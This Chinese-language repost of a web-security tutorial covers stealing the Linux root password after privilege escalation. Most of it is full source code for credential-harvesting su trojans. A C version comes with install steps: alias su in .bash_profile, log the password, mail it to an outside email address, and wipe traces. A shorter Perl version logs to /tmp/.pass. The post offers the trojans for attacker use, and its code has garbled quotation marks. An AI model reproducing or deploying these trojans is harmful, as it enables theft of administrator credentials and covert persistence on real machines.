在webbackdoor本身是root(可能性小的可怜)或通过某漏洞溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧!
先看第一种,kpr-fakesu.c V0.9beta167 fucksu.c
/* * kpr-fakesu.c V0.9beta167 ;P * by koper < koper@linuxmail.org > * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * admin@host:~$ cp .bash_profile .wgetrc * admin@host:~$ echo [alias su=/var/tmp/.su]>>.bash_profile * admin@host:~$ logout * *** LOGIN *** * admin@host:~$ su * Password: * su: Authentication failure * Sorry. * admin@host:~$ su * Password: * root@host :~# logout * admin@host:~$ cat /var/tmp/.pwds * root:dupcia17 * admin@host:~$ * * /bin/su sends various failure information depending on the OS ver. * Please modify the source to make it [fit] * */
#include <stdio.h> #include <stdlib.h>
main(int argc, char *argv[]){
FILE *fp; char *user; char *pass; char filex[100]; char clean[100];
sprintf(filex,]/var/tmp/.pwds]); sprintf(clean,]rm -rf /var/tmp/.su;mv -f /home/admin/.wgetrc /home/admin/.bash_profile]); if(argc==1) user=]root]; if(argc==2) user=argv[1]; if(argc>2){ if(strcmp(argv[1], [-l])==0) user=argv[2]; else user=argv[1];}
fprintf(stdout,]Password: [); pass=getpass ([]); system([sleep 3″); fprintf(stdout,]su: Authentication failurenSorry.n]);
if ((fp=fopen(filex,]w])) != NULL) { fprintf(fp, [%s:%sn], user, pass); fclose(fp); }
system(clean); system([rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su]);
/* If you don’t want password in your e-mail uncomment this line: */
system([uname -a >> /var/tmp/.pwds; cat /var/tmp/.pwds | mail kalikosta@hotmail.com ]);
}
perl版本
perl版本: #!/usr/bin/perl
#################################################################################################### # kyle@freeshell.se 2006 su trojan check so the su path is correct. # # then make alias for trojan first it reads the pass then exec the real su. # # logging to /tmp/.pass # #################################################################################################### print [Password: [; $s1=<STDIN>; print [Sorry.n]; $s2=]Password is: [; $s3=`date +%Y-%m-%d`; open (users, [>>/tmp/.pass]) || die ([Could not open file. $!]); print users ($s2, $s1,$s3); close (users);
system([/bin/su])
另一种方法,替换sshd
本文转自LINUXSO
查看更多关于提权后获取linux root密码 - 网站安全 - 自学php的详细内容...